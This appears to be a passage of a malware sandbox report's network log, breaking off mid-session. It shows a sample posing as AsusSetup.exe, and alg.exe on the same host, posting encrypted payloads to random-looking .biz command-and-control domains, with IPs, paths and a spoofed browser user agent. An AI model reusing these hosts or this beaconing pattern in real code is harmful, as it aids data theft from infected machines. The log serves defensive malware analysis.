                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.000225067 CET778OUTData Raw: 56 7d b8 a6 ee 10 2a 12 fe 02 00 00 ec bb 53 7f fd 94 72 e7 65 ad 86 43 20 02 49 03 67 bd c3 94 4e ef 2b 84 00 b9 ae bd 9a 68 9f d3 68 f5 02 0c cf 45 34 f9 2e 85 d8 14 9b 73 ca 77 32 f1 ff 24 b1 65 0c 29 4b da 18 f0 ab 6b 44 96 cf b6 5f 48 ba 40
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: V}*SreC IgN+hhE4.sw2$e)KkD_H@vSX1gWvt^3GO/:~ls'LLF!YVw&Izi+9n+-PnmrP]vhF{a!S _=l
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.842086077 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=9a38974a2b1241daed946f4945d8acb9|155.94.241.188|1730130600|1730130600|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  2192.168.2.54970618.141.10.107805880C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.026778936 CET344OUTPOST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 800
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.026796103 CET800OUTData Raw: 20 9e 33 7b fe 11 f6 1f 14 03 00 00 9c 1a 1f c1 70 e4 e9 87 95 48 8d 15 fb 42 f2 8e 85 04 da 40 90 3c bb 7f f4 04 35 41 56 d1 05 ef 3b e6 ed 9a 59 11 05 29 32 d2 4d 8c d0 94 f9 02 ac f3 b9 db c0 3a f2 f6 1f 81 f3 15 6f 9e b1 45 9b a8 ea 5f 2c c8
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 3{pHB@<5AV;Y)2M:oE_,POCng4MC2b7}FUI gW4sO!RZ/&}6FrQ9dMQ7EBpF)Q%bH+MD3oE*\'
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.442179918 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=b6e9e4a8fe7c778823bdd60f3f41b2b3|155.94.241.188|1730130601|1730130601|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  3192.168.2.54970718.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.939378023 CET346OUTPOST /flh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.939480066 CET778OUTData Raw: b2 e2 66 0d 35 59 47 e0 fe 02 00 00 c0 35 59 ef 93 1c cc 8f b2 3f c8 bb 01 a6 d7 fa f8 81 44 82 d7 d1 61 ab c4 7c 6a 91 52 a1 1d f7 92 98 93 e9 c1 4c c8 91 e6 b1 f5 61 69 32 cd d9 ba 94 74 c3 f3 fe d6 c7 3c ee 2c 7b 4e 8f cd 91 2f 91 44 c1 88 32
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: f5YG5Y?Da|jRLai2t<,{N/D2lryHmIN>,ZKR+@0LrpsX/-^(<EPe$.i9>fRHnf-Y2aLL1GcC<r @>9\7[,:W^>&i^b|WYQ
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.377466917 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=49463987e232f86878a2b5945c96d660|155.94.241.188|1730130602|1730130602|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  4192.168.2.54970854.244.188.177805880C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648710012 CET353OUTPOST /nxfilvvdujkp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 800
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648732901 CET800OUTData Raw: db ce d1 20 5d 99 ba c9 14 03 00 00 88 5c 03 ee 05 e6 0b b8 ba 70 57 7f 14 cf bf 2e 42 b2 a3 a1 2e ae 4b 0b f8 82 2b 9a f6 6a e2 9d 72 50 3b dc d5 8d 35 04 f6 ee 0c 25 14 50 b6 01 03 48 b9 d7 ef 31 a5 57 fe 13 43 c0 d8 c9 c0 82 e2 9d 3b 12 9e fd
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ]\pW.B.K+jrP;5%PH1WC;v$a6g."]V9=\SUg,m8f~q.BU+^{McV+If<F|uMD\YLw}83]r r*jJ92o^LQ
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.469491005 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=7397ba36972b2f822a61f8a0cd836c25|155.94.241.188|1730130602|1730130602|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  5192.168.2.54970944.221.84.105805880C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698465109 CET351OUTPOST /vicdeig HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 800
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698534966 CET800OUTData Raw: 36 1c 7d 51 5d 4f 2b b0 14 03 00 00 3a bf d9 6b 7a 4d 7d ff 0a 48 eb 52 dc 5f 69 be 19 c3 ad b1 ba 8b 2e 31 c2 b9 ee ab 1d ec 93 b2 fa 8a 94 8a bb 1f 7c 1c 85 af 6b 04 bb fd 92 b4 3f 36 cf 53 d2 03 c5 46 23 65 d3 a0 f7 18 94 0b c8 6f 72 07 47 0e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6}Q]O+:kzM}HR_i.1|k?6SF#eorGcqZOHPT'J\pcgm*|b'wD%$6}`7sZP'8pQ*+Ke0|B 'jC#c@qS@g?WL/_u\.j`O5=-3:*V
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.372359991 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1e495fd4dc936563b16c046c19d20d4e|155.94.241.188|1730130603|1730130603|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  6192.168.2.54971054.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740437031 CET352OUTPOST /fwyvvonbgan HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740464926 CET778OUTData Raw: cf 73 3d 31 0e 3b 98 42 fe 02 00 00 d6 d9 9c 1d 16 19 8e 28 b9 45 10 31 64 46 c5 2b 01 3f b2 d7 21 d0 f3 9d 7d 84 11 ae d8 e3 40 80 05 a7 d3 bf e2 eb a4 4e 52 67 24 36 1a 85 58 82 e3 8a 69 21 f0 a9 a0 eb 58 d6 2b d8 bf b2 04 0e cc be 15 f0 de f5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: s=1;B(E1dF+?!}@NRg$6Xi!X+t/{Pj[Jmd.Aiz:~H[@b|7E9bcysLs6*bnrZ>WV"fS*QRevOWu011\
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.586586952 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=bcf348874fdd29f1f5d8a01d467a14cb|155.94.241.188|1730130603|1730130603|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  7192.168.2.54971144.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920277119 CET354OUTPOST /wurutvkart HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920291901 CET778OUTData Raw: 2c d9 eb 98 54 85 b5 11 fe 02 00 00 d4 7d 98 bc fb c3 74 7d e8 07 b4 d3 23 83 13 a3 c2 7b f4 3a 2c 7b 35 4b 27 9f 36 27 d6 70 4c 9a 3a 86 fd 94 d8 32 e4 d1 41 06 aa 9e b5 54 1b 9c f6 95 8f b9 b4 82 18 bb 95 8a f8 0b fd 5e 83 4c bb 69 76 0f e4 c5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ,T}t}#{:,{5K'6'pL:2AT^LivvP2}n-,_+m`@+:4sHyl'kr+a Y0*orqkT&'V3q%</Q^&<9E0;de|ku~QH6d;|!~
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.587095022 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d8788308211fdad16be0ff16da725d09|155.94.241.188|1730130604|1730130604|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  8192.168.2.549713172.234.222.138802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656956911 CET354OUTPOST /agsaomftijm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656980991 CET778OUTData Raw: 54 78 16 0a f2 62 4b d4 fe 02 00 00 fa 21 30 15 a4 51 21 fd 56 f2 91 77 1f 9b 38 0f 23 09 8b bd 1d 23 cd b9 7c a6 b0 78 e6 6a 93 a5 d2 b8 cf cf fe 66 35 46 22 0d 42 d2 52 56 38 9b 85 fd 19 20 52 18 b2 a3 d7 c0 73 56 e6 67 16 eb c5 80 ab b5 a1 3d
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: TxbK!0Q!Vw8##|xjf5F"BRV8 RsVg=,jTFHS3m d/=rC LAW@i@axt<*MRp_|$usfv2'Zeyq$$uKvf,=}Wb$x" =


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  9192.168.2.549719172.234.222.138802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416445971 CET349OUTPOST /hogxps HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416553020 CET778OUTData Raw: e5 f1 87 07 6d 7a cd d4 fe 02 00 00 c0 71 de bb c2 f5 34 d5 7b 8f a4 a3 b6 19 21 8f 79 5b 4e 6b aa 9c a6 f9 1a db ff 6b ff 70 74 18 d9 c2 f4 d9 32 60 c7 e8 31 5a b2 7e 63 ec 20 77 0c 7f 1e d6 03 b2 ad c0 94 a1 8c 71 31 c5 79 63 9e 18 f0 f6 43 58
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: mzq4{!y[Nkkpt2`1Z~c wq1ycCXx?NcT|Ui?Mr=[buvX.I@f$;H*n^XPE=YiPRH1|]@m5<"'O/kpNr]"(Q@>hlR


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  10192.168.2.54972018.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195262909 CET355OUTPOST /suoyjqbsciv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195286036 CET778OUTData Raw: db fa 35 ef ef 12 35 5a fe 02 00 00 41 79 14 92 b1 2e dc 61 7e a3 2b 2f 9d 30 47 b2 2d d5 3c 62 90 b4 33 d7 16 ad 5c 3b 68 18 ab 21 56 65 c1 7d d9 0b 88 1d 0a c7 de 68 b9 d8 84 e7 ad 41 fd a5 8d fa 08 1d 62 06 9b 88 af 78 05 1a 22 04 c1 bc 97 77
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 55ZAy.a~+/0G-<b3\;h!Ve}hAbx"wiNp:PW_qn#Mm{Ofd7^rxE'8dA};_1fgGX$|)BD[tfiED%3[~TI7Xbj
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.635282040 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cd7b08626de924756b135ad51607bc47|155.94.241.188|1730130607|1730130607|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  11192.168.2.54973082.112.184.197802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.821641922 CET350OUTPOST /uuoiubsg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.821676970 CET778OUTData Raw: 31 9a 96 a9 47 19 14 7e fe 02 00 00 07 0e d1 5a 49 94 5d 23 58 91 9f 1e 35 76 e8 ac de 26 43 04 d5 cc 96 11 68 17 87 6d a1 7e 90 5a d4 e6 31 a2 18 cb 9e 7f 03 c4 f5 7f 30 78 94 e0 42 aa ff 46 f9 30 a4 8c 9f 5f 7d 5c 1d a1 87 18 e7 7f 18 2e f1 d0
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 1G~ZI]#X5v&Chm~Z10xBF0_}\.K|[$i",K%gRZ!P$MG+-r}ZX"]EeaB8D\!P{_'PUiZiQ{Ike^Mlyl)5w /M_V]<;


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  12192.168.2.54978082.112.184.197802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353391886 CET356OUTPOST /dnirvyhujqwqnc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
